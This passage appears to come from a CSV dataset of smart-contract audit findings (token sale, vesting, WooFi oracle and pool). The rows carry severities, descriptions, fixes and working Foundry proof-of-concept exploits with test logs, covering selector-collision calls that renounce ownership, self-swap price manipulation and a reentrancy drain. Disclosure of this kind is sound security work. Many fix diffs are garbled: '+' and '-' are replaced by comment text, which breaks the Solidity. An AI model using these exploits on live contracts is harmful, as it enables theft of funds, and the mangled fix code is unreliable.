usdc.safeTransferFrom(marketingWallet, msg.sender, refundTaxAmount);\\n }\\n s.claimed = true;\\n usdc.safeTransfer(msg.sender, left);\\n emit Claim(msg.sender, left);\\n }\\n```\\n\\n```\\n function _claim(Staked memory _s) internal view returns (uint120, uint256) {\\n uint256 left;\\n if (state.totalPrivateSold > (state.totalSupplyInValue)) {\\n uint256 rate = (state.totalSupplyInValue * PCT_BASE) /\\n state.totalPrivateSold;\\n _s.share = uint120((uint256(_s.amount) * rate) / PCT_BASE);\\n left = uint256(_s.amount) - uint256(_s.share);\\n } else {\\n _s.share = uint120(_s.amount);\\n }\\n\\n return (_s.share, left);\\n }\\n```\\n\\n`left` only has value if the token has oversold. Meaning that even if the user has an infinite tax free allocation, if the token has not oversold, they won't be able to claim a tax refund.",Remove the require check,loss of funds,"```\\n function claim() external {\\n checkingEpoch();\\n require(\\n uint8(epoch) > 1 && !admin.blockClaim(address(this)),\\n ""TokenSale: Not time or not allowed""\\n );\\n\\n Staked storage s = stakes[msg.sender];\\n require(s.amount != 0, ""TokenSale: No Deposit""); \\n require(!s.claimed, ""TokenSale: Already Claimed"");\\n\\n uint256 left;\\n (s.share, left) = _claim(s);\\n require(left > 0, ""TokenSale: Nothing to claim""); // @audit - problematic line \\n uint256 refundTaxAmount;\\n if (s.taxAmount > 0) {\\n uint256 tax = userTaxRate(s.amount, msg.sender);\\n uint256 taxFreeAllc = _maxTaxfreeAllocation(msg.sender) * PCT_BASE;\\n if (taxFreeAllc >= s.share) {\\n refundTaxAmount = s.taxAmount;\\n } else {\\n refundTaxAmount = (left * tax) / POINT_BASE; // tax refund is on the wrong amount \\n }\\n usdc.safeTransferFrom(marketingWallet, msg.sender, refundTaxAmount);\\n }\\n s.claimed = true;\\n usdc.safeTransfer(msg.sender, left);\\n emit Claim(msg.sender, left);\\n }\\n```\\n" +Reentrancy in Vesting.sol:claim() will allow users to drain the contract due to executing .call() on user's address before setting s.index = uint128(i),high,"Reentrancy in Vesting.sol:claim() will allow users to drain the contract due to executing .call() on user's address before setting s.index = uint128(I)\\nHere is the Vesting.sol:claim() function:\\n```\\nfunction claim() external {\\n address sender = msg.sender;\\n\\n UserDetails storage s = userdetails[sender];\\n require(s.userDeposit != 0, ""No Deposit"");\\n require(s.index != vestingPoints.length, ""already claimed"");\\n uint256 pctAmount;\\n uint256 i = s.index;\\n for (i; i <= vestingPoints.length - 1; i++) {\\n if (block.timestamp >= vestingPoints[i][0]) {\\n pctAmount += (s.userDeposit * vestingPoints[i][1]) / 10000;\\n } else {\\n break;\\n }\\n }\\n if (pctAmount != 0) {\\n if (address(token) == address(1)) {\\n (bool sent, ) = payable(sender).call{value: pctAmount}("""");\\n require(sent, ""Failed to send BNB to receiver"");\\n } else {\\n token.safeTransfer(sender, pctAmount);\\n }\\n s.index = uint128(i);\\n s.amountClaimed += pctAmount;\\n }\\n }\\n```\\n\\nFrom the above, You'll notice the claim() function checks if the caller already claimed by checking if the s.index has already been set to vestingPoints.length. You'll also notice the claim() function executes .call() and transfer the amount to the caller before setting the s.index = uint128(i), thereby allowing reentrancy.\\nLet's consider this sample scenario:\\nAn attacker contract(alice) has some native pctAmount to claim and calls `claim()`.\\n""already claimed"" check will pass since it's the first time she's calling `claim()` so her s.index hasn't been set\\nHowever before updating Alice s.index, the Vesting contract performs external .call() to Alice with the amount sent as well\\nAlice reenters `claim()` again on receive of the amount\\nbypass index ""already claimed"" check since this hasn't been updated yet\\ncontract performs external .call() to Alice with the amount sent as well again,\\nSame thing happens again\\nAlice ends up draining the Vesting contract","Here is the recommended fix:\\n```\\nif (pctAmount != 0) {\\n// Add the line below\\n s.index = uint128(i);\\n if (address(token) == address(1)) {\\n (bool sent, ) = payable(sender).call{value: pctAmount}("""");\\n require(sent, ""Failed to send BNB to receiver"");\\n } else {\\n token.safeTransfer(sender, pctAmount);\\n }\\n// Remove the line below\\n s.index = uint128(i);\\n s.amountClaimed // Add the line below\\n= pctAmount;\\n }\\n```\\n\\nI'll also recommend using reentrancyGuard.",Reentrancy in Vesting.sol:claim() will allow users to drain the contract,"```\\nfunction claim() external {\\n address sender = msg.sender;\\n\\n UserDetails storage s = userdetails[sender];\\n require(s.userDeposit != 0, ""No Deposit"");\\n require(s.index != vestingPoints.length, ""already claimed"");\\n uint256 pctAmount;\\n uint256 i = s.index;\\n for (i; i <= vestingPoints.length - 1; i++) {\\n if (block.timestamp >= vestingPoints[i][0]) {\\n pctAmount += (s.userDeposit * vestingPoints[i][1]) / 10000;\\n } else {\\n break;\\n }\\n }\\n if (pctAmount != 0) {\\n if (address(token) == address(1)) {\\n (bool sent, ) = payable(sender).call{value: pctAmount}("""");\\n require(sent, ""Failed to send BNB to receiver"");\\n } else {\\n token.safeTransfer(sender, pctAmount);\\n }\\n s.index = uint128(i);\\n s.amountClaimed += pctAmount;\\n }\\n }\\n```\\n" +Blocklisted investors can still claim USDC in `TokenSale.sol`,medium,"A wrong argument is passed when checking if a user is blacklisted for claiming in `TokenSale.claim()`. Because the check is insufficient, blocked users can claim their USDC.\\n`Admin.setClaimBlock()` blocks users from claiming. The function accepts the address of the user to be blocked and adds it to the `blockClaim` mapping.\\n```\\n /**\\n @dev Whitelist users\\n @param _address Address of User\\n */\\n function setClaimBlock(address _address) external onlyRole(OPERATOR) {\\n blockClaim[_address] = true;\\n }\\n```\\n\\nThe check in `Admin.claim()` wrongly passes `address(this)` as argument when calling `Admin.blockClaim`.\\n```\\n require(\\n uint8(epoch) > 1 && !admin.blockClaim(address(this)),\\n ""TokenSale: Not time or not allowed""\\n );\\n```\\n\\nIn this context, `address(this)` will be the address of the token sale contract and the require statement can be bypassed even by a blocked user.","Pass the address of the user.\\n```\\n require(\\n// Remove the line below\\n uint8(epoch) > 1 && !admin.blockClaim(address(this)),\\n// Add the line below\\n uint8(epoch) > 1 && !admin.blockClaim(msg.sender)),\\n ""TokenSale: Not time or not allowed""\\n );\\n```\\n",The whole functionality for blocking claims doesn't work properly.,```\\n /**\\n @dev Whitelist users\\n @param _address Address of User\\n */\\n function setClaimBlock(address _address) external onlyRole(OPERATOR) {\\n blockClaim[_address] = true;\\n }\\n```\\n +Max allocations can be bypassed with multiple addresses because of guaranteed allocations,medium,"`TokenSale._processPrivate()` ensures that a user cannot deposit more than their allocation amount. However, each address can deposit up to at least `maxAllocations`. This can be leveraged by a malicious user by using different addresses to claim all tokens without even staking.\\nThe idea of the protocol is to give everyone the right to have at least `maxAlocations` allocations. By completing missions, users level up and unlock new tiers. This process will be increasing their allocations. The problem is that when a user has no allocations, they have still a granted amount of `maxAllocations`.\\n`TokenSale.calculateMaxAllocation` returns $max(maxTierAlloc(), maxAllocation)$\\nFor a user with no allocations, `_maxTierAlloc()` will return 0. The final result will be that this user have `maxAllocation` allocations (because `maxAllocation` > 0).\\n```\\n if (userTier == 0 && giftedTierAllc == 0) {\\n return 0;\\n }\\n```\\n\\nMultiple Ethereum accounts can be used by the same party to take control over the IDO and all its allocations, on top of that without even staking.\\nNOTE: setting `maxAllocation = 0` is not a solution in this case because the protocol wants to still give some allocations to their users.",A possible solution may be to modify `calculateMaxAllocation` in the following way:\\n```\\n function calculateMaxAllocation(address _sender) public returns (uint256) {\\n uint256 userMaxAllc = _maxTierAllc(_sender);\\n// Add the line below\\n if (userMaxAllc == 0) return 0;\\n\\n if (userMaxAllc > maxAllocation) {\\n return userMaxAllc;\\n } else {\\n return maxAllocation;\\n }\\n }\\n```\\n,Buying all allocations without staking. This also violates a key property that only ION holders can deposit.,```\\n if (userTier == 0 && giftedTierAllc == 0) {\\n return 0;\\n }\\n```\\n +Potential damages due to incorrect implementation of the ````ZIP```` algorithm,medium,"`WooracleV2_2.fallback()` is used to post zipped token price and state data to the contract for sake of gas saving. However, the first 4 bytes of zipped data are not reserved to distinguish the `ZIP` call and other normal call's function selector. This would cause `ZIP` calls to be accidentally interpreted as any other functions in the contract, result in unintended exceptions and potential damages.\\nAccording solidity's official doc, there are two forms of `fallback()` function `with` or `without` parameter\\n```\\nfallback () external [payable];\\nfallback (bytes calldata _input) external [payable] returns (bytes memory _output);\\n```\\n\\nIf the version with parameters is used, _input will contain the full data sent to the contract (equal to msg.data)\\nAs the `_input` data is equal to `msg.data`, the solidity compiler would firstly check if first 4 bytes matches any normal function selectors, and would only execute `fallback(_input)` while no matching. Therefore, in zipped data, the first 4 bytes must be set to some reserved function selector, such as `0x00000000`, with no collision to normal function selectors. And the real zipped data then starts from 5th byte.\\nThe following coded PoC shows cases that the zipped data is accidentally interpreted as:\\nfunction renounceOwnership(); function setStaleDuration(uint256); function postPrice(address,uint128); function syncTS(uint256);\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nimport {Test} from ""../../lib/forge-std/src/Test.sol"";\\nimport {console2} from ""../../lib/forge-std/src/console2.sol"";\\nimport {WooracleV2_2} from ""../../contracts/wooracle/WooracleV2_2.sol"";\\n\\ncontract WooracleZipBugTest is Test {\\n WooracleV2_2 public oracle;\\n\\n function setUp() public {\\n oracle = new WooracleV2_2();\\n }\\n\\n function testNormalCase() public {\\n /* reference:\\n File: test\\typescript\\wooraclev2_zip_inherit.test.ts\\n 97: function _encode_woo_price() {\\n op = 0\\n len = 1\\n (base, p)\\n base: 6, woo token\\n price: 0.23020\\n 23020000 (decimal = 8)\\n */\\n uint8 base = 6;\\n bytes memory zip = _makeZipData({\\n op: 0,\\n length: 1,\\n leadingBytesOfBody: abi.encodePacked(base, uint32((2302 << 5) + 4))\\n });\\n (bool success, ) = address(oracle).call(zip);\\n assertEq(success, true);\\n address wooAddr = oracle.getBase(6);\\n (uint256 price, bool feasible) = oracle.price(wooAddr);\\n assertEq(price, 23020000);\\n assertTrue(feasible);\\n }\\n\\n function testCollisionWithRenounceOwnership() public {\\n // selector of ""renounceOwnership()"": ""0x715018a6""\\n bytes memory zip = _makeZipData({\\n op: 1,\\n length: 0x31,\\n leadingBytesOfBody: abi.encodePacked(hex""5018a6"")\\n });\\n assertEq(oracle.owner(), address(this));\\n (bool success, ) = address(oracle).call(zip);\\n assertEq(success, true);\\n assertEq(oracle.owner(), address(0));\\n }\\n\\n function testCollisionWithSetStaleDuration() public {\\n // selector of ""setStaleDuration(uint256)"": ""0x99235fd4""\\n bytes memory zip = _makeZipData({\\n op: 2,\\n length: 0x19,\\n leadingBytesOfBody: abi.encodePacked(hex""235fd4"")\\n });\\n assertEq(oracle.staleDuration(), 120); // default: 2 mins\\n (bool success, ) = address(oracle).call(zip);\\n assertEq(success, true);\\n uint256 expectedStaleDuration;\\n assembly {\\n expectedStaleDuration := mload(add(zip, 36))\\n }\\n assertEq(oracle.staleDuration(), expectedStaleDuration);\\n assertTrue(expectedStaleDuration != 120);\\n }\\n\\n function testCollisionWithPostPrice() public {\\n // selector of ""postPrice(address,uint128)"": ""0xd5bade07""\\n bytes memory addressAndPrice = abi.encode(address(0x1111), uint256(100));\\n bytes memory zip = _makeZipData({\\n op: 3,\\n length: 0x15,\\n leadingBytesOfBody: abi.encodePacked(hex""bade07"", addressAndPrice)\\n });\\n (bool success, ) = address(oracle).call(zip);\\n assertEq(success, true);\\n (uint256 price, bool feasible) = oracle.price(address(0x1111));\\n assertEq(price, 100);\\n assertTrue(feasible);\\n }\\n\\n function testCollisionWithSyncTS() public {\\n // selector of ""syncTS(uint256)"": ""4f1f1999""\\n uint256 timestamp = 12345678;\\n bytes memory zip = _makeZipData({\\n op: 1,\\n length: 0xf,\\n leadingBytesOfBody: abi.encodePacked(hex""1f1999"", timestamp)\\n });\\n (bool success, ) = address(oracle).call(zip);\\n assertEq(success, true);\\n assertEq(oracle.timestamp(), timestamp);\\n }\\n\\n function _makeZipData(\\n uint8 op,\\n uint8 length,\\n bytes memory leadingBytesOfBody\\n ) internal returns (bytes memory result) {\\n assertTrue(length < 2 ** 6);\\n assertTrue(op < 4);\\n bytes1 head = bytes1(uint8((op << 6) + (length & 0x3F)));\\n uint256 sizeOfItem = op == 0 || op == 2 ? 5 : 13;\\n uint256 sizeOfHead = 1;\\n uint256 sizeOfBody = sizeOfItem * length;\\n assertTrue(sizeOfBody >= leadingBytesOfBody.length);\\n result = bytes.concat(head, leadingBytesOfBody, _makePseudoRandomBytes(sizeOfBody - leadingBytesOfBody.length));\\n assertEq(result.length, sizeOfHead + sizeOfBody);\\n }\\n\\n function _makePseudoRandomBytes(uint256 length) internal returns (bytes memory result) {\\n uint256 words = (length + 31) / 32;\\n result = new bytes(words * 32);\\n for (uint256 i; i < words; ++i) {\\n bytes32 rand = keccak256(abi.encode(block.timestamp + i));\\n assembly {\\n mstore(add(add(result, 32), mul(i, 32)), rand)\\n }\\n }\\n\\n assembly {\\n mstore(result, length) // change to required length\\n }\\n assertEq(length, result.length);\\n }\\n}\\n```\\n\\nAnd the logs:\\n```\\n2024-03-woofi-swap\\WooPoolV2> forge test --match-contract WooracleZipBugTest -vv\\n[⠢] Compiling// rest of codeNo files changed, compilation skipped\\n[⠆] Compiling// rest of code\\n\\nRunning 5 tests for test/foundry/WooracleZipBug.t.sol:WooracleZipBugTest\\n[PASS] testCollisionWithPostPrice() (gas: 48643)\\n[PASS] testCollisionWithRenounceOwnership() (gas: 21301)\\n[PASS] testCollisionWithSetStaleDuration() (gas: 18289)\\n[PASS] testCollisionWithSyncTS() (gas: 35302)\\n[PASS] testNormalCase() (gas: 48027)\\nTest result: ok. 5 passed; 0 failed; 0 skipped; finished in 2.13ms\\n\\nRan 1 test suites: 5 tests passed, 0 failed, 0 skipped (5 total tests)\\n```\\n","```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/WooPoolV2/contracts/wooracle/WooracleV2_2.sol b/WooPoolV2/contracts/wooracle/WooracleV2_2.sol\\nindex 9e66c63..4a9138f 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/WooPoolV2/contracts/wooracle/WooracleV2_2.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/WooPoolV2/contracts/wooracle/WooracleV2_2.sol\\n@@ // Remove the line below\\n416,9 // Add the line below\\n416,10 @@ contract WooracleV2_2 is Ownable, IWooracleV2 {\\n */\\n\\n uint256 x = _input.length;\\n// Remove the line below\\n require(x > 0, ""WooracleV2_2: !calldata"");\\n// Add the line below\\n require(x > 4, ""WooracleV2_2: !calldata"");\\n// Add the line below\\n require(bytes4(_input[0:4]) == bytes4(hex""00000000""));\\n\\n// Remove the line below\\n uint8 firstByte = uint8(bytes1(_input[0]));\\n// Add the line below\\n uint8 firstByte = uint8(bytes1(_input[5]));\\n uint8 op = firstByte 6; // 11000000\\n uint8 len = firstByte & 0x3F; // 00111111\\n\\n@@ // Remove the line below\\n428,12 // Add the line below\\n429,12 @@ contract WooracleV2_2 is Ownable, IWooracleV2 {\\n uint128 p;\\n\\n for (uint256 i = 0; i < len; // Add the line below\\n// Add the line below\\ni) {\\n// Remove the line below\\n base = getBase(uint8(bytes1(_input[1 // Add the line below\\n i * 5:1 // Add the line below\\n i * 5 // Add the line below\\n 1])));\\n// Remove the line below\\n p = _decodePrice(uint32(bytes4(_input[1 // Add the line below\\n i * 5 // Add the line below\\n 1:1 // Add the line below\\n i * 5 // Add the line below\\n 5])));\\n// Add the line below\\n base = getBase(uint8(bytes1(_input[5 // Add the line below\\n i * 5:5 // Add the line below\\n i * 5 // Add the line below\\n 1])));\\n// Add the line below\\n p = _decodePrice(uint32(bytes4(_input[5 // Add the line below\\n i * 5 // Add the line below\\n 1:5 // Add the line below\\n i * 5 // Add the line below\\n 5])));\\n infos[base].price = p;\\n }\\n\\n// Remove the line below\\n timestamp = (op == 0) ? block.timestamp : uint256(uint32(bytes4(_input[1 // Add the line below\\n len * 5:1 // Add the line below\\n len * 5 // Add the line below\\n 4])));\\n// Add the line below\\n timestamp = (op == 0) ? block.timestamp : uint256(uint32(bytes4(_input[5 // Add the line below\\n len * 5:5 // Add the line below\\n len * 5 // Add the line below\\n 4])));\\n } else if (op == 1 || op == 3) {\\n // post states list\\n address base;\\n@@ // Remove the line below\\n442,14 // Add the line below\\n443,14 @@ contract WooracleV2_2 is Ownable, IWooracleV2 {\\n uint64 k;\\n\\n for (uint256 i = 0; i < len; // Add the line below\\n// Add the line below\\ni) {\\n// Remove the line below\\n base = getBase(uint8(bytes1(_input[1 // Add the line below\\n i * 9:1 // Add the line below\\n i * 9 // Add the line below\\n 1])));\\n// Remove the line below\\n p = _decodePrice(uint32(bytes4(_input[1 // Add the line below\\n i * 9 // Add the line below\\n 1:1 // Add the line below\\n i * 9 // Add the line below\\n 5])));\\n// Remove the line below\\n s = _decodeKS(uint16(bytes2(_input[1 // Add the line below\\n i * 9 // Add the line below\\n 5:1 // Add the line below\\n i * 9 // Add the line below\\n 7])));\\n// Remove the line below\\n k = _decodeKS(uint16(bytes2(_input[1 // Add the line below\\n i * 9 // Add the line below\\n 7:1 // Add the line below\\n i * 9 // Add the line below\\n 9])));\\n// Add the line below\\n base = getBase(uint8(bytes1(_input[5 // Add the line below\\n i * 9:5 // Add the line below\\n i * 9 // Add the line below\\n 1])));\\n// Add the line below\\n p = _decodePrice(uint32(bytes4(_input[5 // Add the line below\\n i * 9 // Add the line below\\n 1:5 // Add the line below\\n i * 9 // Add the line below\\n 5])));\\n// Add the line below\\n s = _decodeKS(uint16(bytes2(_input[5 // Add the line below\\n i * 9 // Add the line below\\n 5:5 // Add the line below\\n i * 9 // Add the line below\\n 7])));\\n// Add the line below\\n k = _decodeKS(uint16(bytes2(_input[5 // Add the line below\\n i * 9 // Add the line below\\n 7:5 // Add the line below\\n i * 9 // Add the line below\\n 9])));\\n _setState(base, p, s, k);\\n }\\n\\n// Remove the line below\\n timestamp = (op == 1) ? block.timestamp : uint256(uint32(bytes4(_input[1 // Add the line below\\n len * 9:1 // Add the line below\\n len * 9 // Add the line below\\n 4])));\\n// Add the line below\\n timestamp = (op == 1) ? block.timestamp : uint256(uint32(bytes4(_input[5 // Add the line below\\n len * 9:5 // Add the line below\\n len * 9 // Add the line below\\n 4])));\\n } else {\\n revert(""WooracleV2_2: !op"");\\n }\\n```\\n","This bug would result in unintended exceptions and potential damages such as:\\nCollision with normal price post functions might cause users' trades executed on incorrect price and suffer losses.\\nCollision with any view function might cause price post to fail silently and hold on trade processing until next submission, and users' trades might be executed on a delayed inexact price.\\nCollision with `setStaleDuration()` might cause price freshness check to break down.",```\\nfallback () external [payable];\\nfallback (bytes calldata _input) external [payable] returns (bytes memory _output);\\n```\\n +Price manipulation by swapping any ````baseToken```` with itself,medium,"`WooPPV2.swap()` doesn't forbid the case that `fromToken == toToken == baseToken`, attackers can make any baseToken's price unboundedly drifting away by swapping with self.\\nThe issue arises due to incorrect logic in WooPPV2._swapBaseToBase():\\nFirstly, we can see the situation that `fromToken == toToken == baseToken` can pass the checks on L521~L522.\\nbaseToken's state & price is cached in memory on L527~L528, and updated first time on L541, but the price calculation on L555 still uses the cached state, and the `newBase2Price` is set to `wooracle` on L556 as the final price after the swap.\\nAs a result, swapping `baseToken` with itself will cause a net price drift rather than keeping price unchanged.\\n```\\nFile: contracts\\WooPPV2.sol\\n function _swapBaseToBase(\\n// rest of code\\n ) private nonReentrant whenNotPaused returns (uint256 base2Amount) {\\n require(baseToken1 != address(0) && baseToken1 != quoteToken, ""WooPPV2: !baseToken1"");\\n require(baseToken2 != address(0) && baseToken2 != quoteToken, ""WooPPV2: !baseToken2"");\\n// rest of code\\n IWooracleV2.State memory state1 = IWooracleV2(wooracle).state(baseToken1);\\n IWooracleV2.State memory state2 = IWooracleV2(wooracle).state(baseToken2);\\n// rest of code\\n uint256 newBase1Price;\\n (quoteAmount, newBase1Price) = _calcQuoteAmountSellBase(baseToken1, base1Amount, state1);\\n IWooracleV2(wooracle).postPrice(baseToken1, uint128(newBase1Price));\\n// rest of code\\n uint256 newBase2Price;\\n (base2Amount, newBase2Price) = _calcBaseAmountSellQuote(baseToken2, quoteAmount, state2);\\n IWooracleV2(wooracle).postPrice(baseToken2, uint128(newBase2Price));\\n// rest of code\\n }\\n```\\n\\nThe following coded PoC intuitively shows the problem with a specific case:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nimport {Test} from ""../../lib/forge-std/src/Test.sol"";\\nimport {console2} from ""../../lib/forge-std/src/console2.sol"";\\nimport {WooracleV2_2} from ""../../contracts/wooracle/WooracleV2_2.sol"";\\nimport {WooPPV2} from ""../../contracts/WooPPV2.sol"";\\nimport {TestERC20Token} from ""../../contracts/test/TestERC20Token.sol"";\\nimport {TestUsdtToken} from ""../../contracts/test/TestUsdtToken.sol"";\\n\\ncontract TestWbctToken is TestERC20Token {\\n function decimals() public view virtual override returns (uint8) {\\n return 8;\\n }\\n}\\n\\ncontract PriceManipulationAttackTest is Test {\\n WooracleV2_2 oracle;\\n WooPPV2 pool;\\n TestUsdtToken usdt;\\n TestWbctToken wbtc;\\n address evil = address(0xbad);\\n\\n function setUp() public {\\n usdt = new TestUsdtToken();\\n wbtc = new TestWbctToken();\\n oracle = new WooracleV2_2();\\n pool = new WooPPV2(address(usdt));\\n\\n // parameters reference: Integration_WooPP_Fee_Rebate_Vault.test.ts\\n pool.setMaxGamma(address(wbtc), 0.1e18);\\n pool.setMaxNotionalSwap(address(wbtc), 5_000_000e6);\\n pool.setFeeRate(address(wbtc), 25);\\n oracle.postState({_base: address(wbtc), _price: 50_000e8, _spread: 0.001e18, _coeff: 0.000000001e18});\\n oracle.setWooPP(address(pool));\\n oracle.setAdmin(address(pool), true);\\n pool.setWooracle(address(oracle));\\n\\n // add some initial liquidity\\n usdt.mint(address(this), 10_000_000e6);\\n usdt.approve(address(pool), type(uint256).max);\\n pool.depositAll(address(usdt));\\n\\n wbtc.mint(address(this), 100e8);\\n wbtc.approve(address(pool), type(uint256).max);\\n pool.depositAll(address(wbtc));\\n }\\n\\n function testMaxPriceDriftInNormalCase() public {\\n (uint256 initPrice, bool feasible) = oracle.price(address(wbtc));\\n assertTrue(feasible);\\n assertEq(initPrice, 50_000e8);\\n\\n // buy almost all wbtc in pool\\n usdt.mint(address(this), 5_000_000e6);\\n usdt.transfer(address(pool), 5_000_000e6);\\n pool.swap({\\n fromToken: address(usdt),\\n toToken: address(wbtc),\\n fromAmount: 5_000_000e6,\\n minToAmount: 0,\\n to: address(this),\\n rebateTo: address(this)\\n });\\n\\n (uint256 pastPrice, bool feasible2) = oracle.price(address(wbtc));\\n assertTrue(feasible2);\\n uint256 drift = ((pastPrice - initPrice) * 1e5) / initPrice;\\n assertEq(drift, 502); // 0.502%\\n console2.log(""Max price drift in normal case: "", _toPercentString(drift));\\n }\\n\\n function testUnboundPriceDriftInAttackCase() public {\\n (uint256 initPrice, bool feasible) = oracle.price(address(wbtc));\\n assertTrue(feasible);\\n assertEq(initPrice, 50_000e8);\\n\\n // top up the evil, in real case, the fund could be from a flashloan\\n wbtc.mint(evil, 100e8);\\n\\n for (uint256 i; i < 10; ++i) {\\n vm.startPrank(evil);\\n uint256 balance = wbtc.balanceOf(evil);\\n wbtc.transfer(address(pool), balance);\\n pool.swap({\\n fromToken: address(wbtc),\\n toToken: address(wbtc),\\n fromAmount: balance,\\n minToAmount: 0,\\n to: evil,\\n rebateTo: evil\\n });\\n (uint256 pastPrice, bool feasible2) = oracle.price(address(wbtc));\\n assertTrue(feasible2);\\n uint256 drift = ((pastPrice - initPrice) * 1e5) / initPrice;\\n console2.log(""Unbound price drift in attack case: "", _toPercentString(drift)); \\n vm.stopPrank();\\n }\\n }\\n\\n function _toPercentString(uint256 drift) internal pure returns (string memory result) {\\n uint256 d_3 = drift % 10;\\n uint256 d_2 = (drift / 10) % 10;\\n uint256 d_1 = (drift / 100) % 10;\\n uint256 d0 = (drift / 1000) % 10;\\n result = string.concat(_toString(d0), ""."", _toString(d_1), _toString(d_2), _toString(d_3), ""%"");\\n uint256 d = drift / 10000;\\n while (d > 0) {\\n result = string.concat(_toString(d % 10), result);\\n d = d / 10;\\n }\\n }\\n\\n function _toString(uint256 digital) internal pure returns (string memory str) {\\n str = new string(1);\\n bytes16 symbols = ""0123456789abcdef"";\\n assembly {\\n mstore8(add(str, 32), byte(digital, symbols))\\n }\\n }\\n}\\n```\\n\\nAnd the logs:\\n```\\n2024-03-woofi-swap\\WooPoolV2> forge test --match-contract PriceManipulationAttackTest -vv\\n[⠆] Compiling// rest of codeNo files changed, compilation skipped\\n[⠰] Compiling// rest of code\\n\\nRunning 2 tests for test/foundry/PriceManipulationAttack.t.sol:PriceManipulationAttackTest\\n[PASS] testMaxPriceDriftInNormalCase() (gas: 158149)\\nLogs:\\n Max price drift in normal case: 0.502%\\n\\n[PASS] testUnboundPriceDriftInAttackCase() (gas: 648243)\\nLogs:\\n Unbound price drift in attack case: 0.499%\\n Unbound price drift in attack case: 0.998%\\n Unbound price drift in attack case: 1.496%\\n Unbound price drift in attack case: 1.994%\\n Unbound price drift in attack case: 2.491%\\n Unbound price drift in attack case: 2.988%\\n Unbound price drift in attack case: 3.483%\\n Unbound price drift in attack case: 3.978%\\n Unbound price drift in attack case: 4.473%\\n Unbound price drift in attack case: 4.967%\\n\\nTest result: ok. 2 passed; 0 failed; 0 skipped; finished in 6.59ms\\n\\nRan 1 test suites: 2 tests passed, 0 failed, 0 skipped (2 total tests)\\n```\\n","```\\n2024-03-woofi-swap\\WooPoolV2> git diff\\ndiff --git a/WooPoolV2/contracts/WooPPV2.sol b/WooPoolV2/contracts/WooPPV2.sol\\nindex e7a6ae8..9440089 100644\\n--- a/WooPoolV2/contracts/WooPPV2.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/WooPoolV2/contracts/WooPPV2.sol\\n@@ -520,6 // Add the line below\\n520,7 @@ contract WooPPV2 is Ownable, ReentrancyGuard, Pausable, IWooPPV2 {\\n ) private nonReentrant whenNotPaused returns (uint256 base2Amount) {\\n require(baseToken1 != address(0) && baseToken1 != quoteToken, ""WooPPV2: !baseToken1"");\\n require(baseToken2 != address(0) && baseToken2 != quoteToken, ""WooPPV2: !baseToken2"");\\n// Add the line below\\n require(baseToken1 != baseToken2, ""WooPPV2: baseToken1 == baseToken2"");\\n require(to != address(0), ""WooPPV2: !to"");\\n\\n require(balance(baseToken1) - tokenInfos[baseToken1].reserve >= base1Amount, ""WooPPV2: !BASE1_BALANCE"");\\n```\\n",,"```\\nFile: contracts\\WooPPV2.sol\\n function _swapBaseToBase(\\n// rest of code\\n ) private nonReentrant whenNotPaused returns (uint256 base2Amount) {\\n require(baseToken1 != address(0) && baseToken1 != quoteToken, ""WooPPV2: !baseToken1"");\\n require(baseToken2 != address(0) && baseToken2 != quoteToken, ""WooPPV2: !baseToken2"");\\n// rest of code\\n IWooracleV2.State memory state1 = IWooracleV2(wooracle).state(baseToken1);\\n IWooracleV2.State memory state2 = IWooracleV2(wooracle).state(baseToken2);\\n// rest of code\\n uint256 newBase1Price;\\n (quoteAmount, newBase1Price) = _calcQuoteAmountSellBase(baseToken1, base1Amount, state1);\\n IWooracleV2(wooracle).postPrice(baseToken1, uint128(newBase1Price));\\n// rest of code\\n uint256 newBase2Price;\\n (base2Amount, newBase2Price) = _calcBaseAmountSellQuote(baseToken2, quoteAmount, state2);\\n IWooracleV2(wooracle).postPrice(baseToken2, uint128(newBase2Price));\\n// rest of code\\n }\\n```\\n" +WooFi oracle can fail to validate its price with Chainlink price feed,medium,"The price precision that the WooOracle uses is 8. However, if the quote token is an expensive token or the base token is a very cheap token, then the price will be too less in decimals and even ""0"" in some cases. This will lead to inefficient trades or inability to compare the woofi price with chainlink price due to chainlink price return with ""0"" value.\\nFirst, let's see how the chainlink price is calculated:\\n```\\nfunction _cloPriceInQuote(address _fromToken, address _toToken)\\n internal\\n view\\n returns (uint256 refPrice, uint256 refTimestamp)\\n {\\n address baseOracle = clOracles[_fromToken].oracle;\\n if (baseOracle == address(0)) {\\n return (0, 0);\\n }\\n address quoteOracle = clOracles[_toToken].oracle;\\n uint8 quoteDecimal = clOracles[_toToken].decimal;\\n\\n (, int256 rawBaseRefPrice, , uint256 baseUpdatedAt, ) = AggregatorV3Interface(baseOracle).latestRoundData();\\n (, int256 rawQuoteRefPrice, , uint256 quoteUpdatedAt, ) = AggregatorV3Interface(quoteOracle).latestRoundData();\\n uint256 baseRefPrice = uint256(rawBaseRefPrice);\\n uint256 quoteRefPrice = uint256(rawQuoteRefPrice);\\n\\n // NOTE: Assume wooracle token decimal is same as chainlink token decimal.\\n uint256 ceoff = uint256(10)**quoteDecimal;\\n refPrice = (baseRefPrice * ceoff) / quoteRefPrice;\\n refTimestamp = baseUpdatedAt >= quoteUpdatedAt ? quoteUpdatedAt : baseUpdatedAt;\\n }\\n```\\n\\nNow, let's assume the quote token is WBTC price of 60,000$ and the baseToken is tokenX that has the price of 0.0001$. When the final price is calculated atrefPrice because of the divisions in solidity, the result will be ""0"" as follows: 60_000 * 1e8 * 1e8 / 0.0001 * 1e8 = 0\\nso the return amount will be ""0"".\\nWhen the derived chainlink price is compared with woofi oracle if the chainlink price is ""0"" then the `woPriceInBound` will be set to ""true"" assuming the chainlink price is not set. However, in our case that's not the case, the price returnt ""0"" because of divisions:\\n```\\n-> bool woPriceInBound = cloPrice_ == 0 ||\\n ((cloPrice_ * (1e18 - bound)) / 1e18 <= woPrice_ && woPrice_ <= (cloPrice_ * (1e18 + bound)) / 1e18);\\n\\n if (woFeasible) {\\n priceOut = woPrice_;\\n feasible = woPriceInBound;\\n }\\n```\\n\\nIn such scenario, the chainlink comparison between woofi and chainlink price will not give correct results. The oracle will not be able to detect whether the chainlink price is in ""bound"" with the woofi's returnt price.\\nThis also applies if a baseToken price crushes. If the token price gets very less due to market, regardless of the quoteToken being WBTC or USDC the above scenario can happen.","Precision of ""8"" is not 